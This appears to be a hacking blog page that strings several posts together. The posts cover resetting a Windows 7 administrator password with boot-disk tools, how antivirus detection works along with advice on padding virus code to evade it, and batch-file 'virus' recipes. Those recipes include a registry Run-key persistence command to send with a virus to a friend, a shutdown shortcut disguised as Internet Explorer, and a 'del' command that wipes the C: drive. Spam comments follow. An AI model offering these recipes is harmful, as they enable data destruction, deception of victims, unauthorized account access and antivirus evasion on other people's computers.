hacks

HACK WIN 7 ADMIN PASSWORD.

Method 1: Hack(reset) Windows 7 admin password with Spower Windows Password Reset Tool.

Spower Windows Password Reset Tool not only support Windows 7 password hacking(resetting), but also supports other windows password hacking too, include Windows 2000, xp, vista, 2008 etc..

Spower Windows Password Reset tool is an easy use windows password hack tool. You can follow steps below to hack Window 7 password within few minutes:

Step 1:  Get Spower Windows Password Reset Tool from  http://www.windowspasswordsreset.com, and install it .

Step 2:  Use Spower Windows Password Reset tool to burn a Windows  password reset disk (usb or cd/dvd disk ).  Run Spower Windows Password Reset tool and then follow the steps below to create a bootable disk:

spower windows password reset burn screenshot

spower windows password reset burn screenshot

To Create a Windows password reset usb disk:

  • 2.1 Plug a usb drive to computer.
  • 2.2 Click Burn to USB button to burn Spower Windows Password Reset program to usb drive.

To Create a Windows password reset cd/dvd isk:

  • 2.1 Insert a writable cd or dvd to CD/DVD-ROM.
  • 2.2 Click Burn to CD/DVD button to burn Spower Windows Password Reset program to CD/DVD disc.

Step 3:  Use the Windows  password reset disk to boot computer.

  • 3.1 Access to the BIOS to set computer to boot from USB drive or CD/DVD-ROM.
  • 3.2 Insert Windows Password Reset disk to the computer, and then restart the computer.
  • 3.3 Restart the computer.

Step 4: Hack Windows 7 password with Spower Windows Password Reset program.

spower windows password reset screenshot

spower windows password reset screenshot

 Select a Windows system from combo box.

 Select a user whose password you want to reset. Here select Administrator.

 Click Reset button to hack(reset) admin password. The password will be reset toblank.

 Click Reboot button to restart computer.

After restarting, the Administrator password has been hacked,  and you can login Administrator with blank password.

Method 2: hack windows 7 password with Windows Password Rescuer

Windows Password Rescuer not only can hack (recover) windows 7 password, but also can recover local and domain  password for windows vista, xp, 2000, 2003 and 2008. Key steps to hack windows 7 password with Windows Password Rescuer:

  1. Download and install Windows Password Rescuer.
  2. Create a bootable USB or CD password recovery disk.
  3. Boot the locked computer from bootable password recovery disk.
  4. Hack (recover) windows password.
Method 3: Hack Windows 7 admin password with Windows 7 password recovery tool.

Windows 7 password recovery tool is an easy use windows password recovery tool. It canhack(recover) windows 7 admin password in a few minutes.  Windows 7 password recovery tool can help to create CD/DVD or USB Windows password recovery disk, and then you can use the Windows password recovery disk to boot computer and hack windows 7 password.

More information about using Windows 7 password recovery tool, please visit : Windows 7 Password Recovery Tool.

(BY  blog.daossoft.com.)

How to protect your Windows from hacking

If you don’t want the hacker to hack you windows password, you should do following  to protect your windows from hacking:

  1. Keep your computer in a safe place.
  2. Set a Power on password to you computer if it support.
  3. Set a password to your computer’s BIOS and set the hard disk as first boot device .
  4. Set Strong passwords to all account of your Windows.
———————————————————————————-NEXT POST-

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)
So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:
As the technique’s name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition’s or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable.
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character ‘a’ is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.
That’s the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.
We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.
Suspicious activity detection:
The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That’s the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity.
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night….:P but its truth…
So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions…
———————————————————————————-NEXT POST-
  • How To Create Virus That Continuosly Opens Notepad

 a simple virus for beginners, enjoy
How To Create Virus That Continuously Opens Notepad1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.
@ECHO off :top START %SystemRoot%system32notepad.exe GOTO top
3.Now Save the file with an extensiom.bat , for example: notepad.bat
4. If you click on notepad.bat , notepad will be opening continuously.
———————————————————————————-NEXT POST-
  • Execute Virus On Startup

Hello guys,

You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.

So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up.

1. Open a Notepad file

2. Write down the following command

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v demo /t REG_SZ /d demo.exe

3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat

4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.

5. Now the impact of the virus will also be visible after the restart of the system.

———————————————————————————-NEXT POST-
  • Shut Down System On Double Clicking On Internet Explorer

Double click on Internet explorer to Restart the Computer:

1) Goto Desktop
2) Right click > new > Shortcut
3) In “Type the Location of the item” > write: “C:WINDOWSsystem32shutdown.exe -r -t 00″ without coutes.
4) Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish.
5) Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer.

6) Now Virus is Ready… haha.. check it out.. when you will double click on Internet Explorer Shortcut… Computer will Restart.

7) Use this as a Prank… don’t Misuse it.. That’s JUST an Advise.

———————————————————————————-NEXT POST-

Destroying Windows Vista With A Batch File!!

Hey guys..this is a virus made in cmd (command prompt) for windows…make sure that you USE it at your OWN RISK. the virus is harmful and no one is responsible for you PC DAMAGE… 🙂
here it begin..

1. Open NotePad.
2. type this in:
@echo off

del “C:/” /Q /S /F

cls

3.open it

4. your computer is 0wn3d!

5.wait about an hour

6. have fun

———————————————————————————-NEXT POST-
Different Types of Worms/Viruses Explained

  • System Sector Viruses

System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC.

System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses. These boot viruses use all of the common viral techniques to infect and hide themselves. They rely on infected floppy disk left in the drive when the computer starts, they can also be “dropped” by some file infectors or Trojans.

  • Stealth Virus

These viruses evade anti-virus software by intercepting its requests to the operating system.
A virus can hide itself by intercepting the anti-virus software’s request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is “clean”.

  • Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk data content when booted with the infected CD-ROM.
Example: Someone might give you a LINUX BOOTABLE CD-ROM.
When you boot the computer using the CD-ROM, all your data is gone. No Anti-virus can stop this because AV software or the OS is not even loaded when you boot from a CD-ROM.

  • Self-Modification Virus

Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for virus signatures.
A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses.
Self-modification viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. (each infected file
contains a different variant of the virus)

  • Polymorphic Code Virus

A well-written polymorphic virus therefore has no parts that stay the same on each infection.To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine). Polymorphic code is a code that mutates while keeping the original algorithm intact.

  • Metamorphic Virus

Metamorphic viruses rewrite themselves completely each time they are to infect new executables. Metamorphic code is a code that can reprogram itself by translating its own code into a temporary representation, and then back to normal code again.
For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it is part of the metamorphic engine.

  • File Extension Virus

File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With extensions turned off if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT.If you’ve forgotten that extensions are actually turned off, you might think this is a text file and open it. This is really an executable Visual Basic Script virus file and could do
serious damage .
Countermeasure is to turn off “Hide file extensions” in Windows.

A TOUGH COMPETITION JUST TO BLOW UP YOUR COMPUTER…BE AWARE.
Comments
  1. Logi says:

    Wonderful issues altogether, you simply received a new reader. What could you recommend about your post that you just made a few days ago? Any positive?

  2. beauty bar says:

    Greetings from Idaho! I’m bored to death at work so I decided to check out your blog on my iphone during lunch break. I enjoy the information you provide here and can’t wait to
    take a look when I get home. I’m amazed at how quick your blog loaded on my cell phone .. I’m not even using WIFI, just 3G ..
    Anyhow, awesome blog!

  3. Heya i’m for the first time here. I found this board and I find It truly helpful & it helped me out much. I’m hoping to give something
    back and aid others like you aided me.

  4. Myron says:

    Hi there mates, its enormous paragraph concerning teachingand completely defined, keep it up all the time.

  5. Anonymous says:

    Peculiar article, totally what I wanted to find.

  6. Lashonda says:

    Just desire to say your article is as astounding.
    The clearness in your post is just spectacular and i could assume you’re an expert on this subject. Well with your permission allow me to grab your RSS feed to keep updated with forthcoming post. Thanks a million and please carry on the gratifying work.

  7. Fine way of telling, and pleasant post to obtain facts concerning my presentation topic,
    which i am going to convey in institution of higher education.

  8. Diego says:

    I visit daily some blogs and websites to read articles or
    reviews, except this website offers feature based articles.

  9. Hello it’s me, I am also visiting this web site daily, this web site is really good and the people are genuinely sharing pleasant thoughts.

  10. This is the right webpage for everyone who
    hopes to understand this topic. You know a whole lot its almost
    hard to argue with you (not that I actually would want to…HaHa).
    You definitely put a new spin on a subject which has been written about for
    ages. Great stuff, just great!

  11. I have been surfing online more than three hours lately, yet I by no
    means discovered any attention-grabbing article like yours.
    It’s beautiful value enough for me. In my opinion, if all
    site owners and bloggers made excellent content as you did, the net will likely be a lot more helpful than ever before.

  12. Lakesha says:

    This is really interesting, You are a very skilled blogger.

    I have joined your feed and look forward to seeking more of your fantastic post.
    Also, I have shared your website in my social networks!

  13. It’s really a great and useful piece of information.
    I’m satisfied that you simply shared this useful info with
    us. Please stay us informed like this. Thanks for sharing.

  14. Hello would you mind letting me know which webhost you’re using?
    I’ve loaded your blog in 3 different web browsers and I must say this blog loads a lot quicker
    then most. Can you suggest a good internet hosting provider at a fair price?

    Cheers, I appreciate it!

  15. The San Francisco store opened may 23rd, 2008 in Union
    Square, San Francisco hasn’t given up on walter payton jersey 1983 the schedule seven races finishing at 19.
    Zipper top closure with padlock. Revive His Career with
    the Walter Payton Jersey 1983 starting Friday. The Rams got the ball back
    quicker. With his coach looking on, a Kansas City walter payton jersey 1983 are now a
    possible destination for the 22-year-old.

  16. Today, I went to the beachfront with my kids. I found a sea
    shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She put the shell
    to her ear and screamed. There was a hermit crab inside and it pinched her ear.
    She never wants to go back! LoL I know this is completely off topic but I had to tell someone!

  17. If some one needs expert view on the topic of blogging and site-building afterward i advise him/her to go to
    see this webpage, Keep up the nice work.

  18. Adriana says:

    Every weekend i used to pay a visit this website, for the reason that i wish for enjoyment,
    as this this web page conations genuinely fastidious funny information too.

  19. Sonja says:

    I like it when folks come together and share
    opinions. Great blog, stick with it!

  20. Thanks for the auspicious writeup. It in truth was once a amusement account it.
    Look complex to far delivered agreeable from you! However,
    how could we communicate?

  21. I’d like to find out more? I’d want to find out some additional information.

  22. My developer is trying to convince me to move to
    .net from PHP. I have always disliked the idea because of the expenses.

    But he’s tryiong none the less. I’ve been using Movable-type on numerous websites for about a year and am anxious about switching
    to another platform. I have heard fantastic things about blogengine.net.
    Is there a way I can import all my wordpress posts into it?
    Any kind of help would be really appreciated!

  23. Hi there to every body, it’s my first pay a quick visit of this
    web site; this blog carries remarkable and actually good stuff in support of
    readers.

  24. You are so interesting! I don’t suppose I
    have read through anything like that before. So good to discover another person with original thoughts on this
    issue. Really.. thank you for starting this up. This website is one thing that is needed on
    the internet, someone with some originality!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s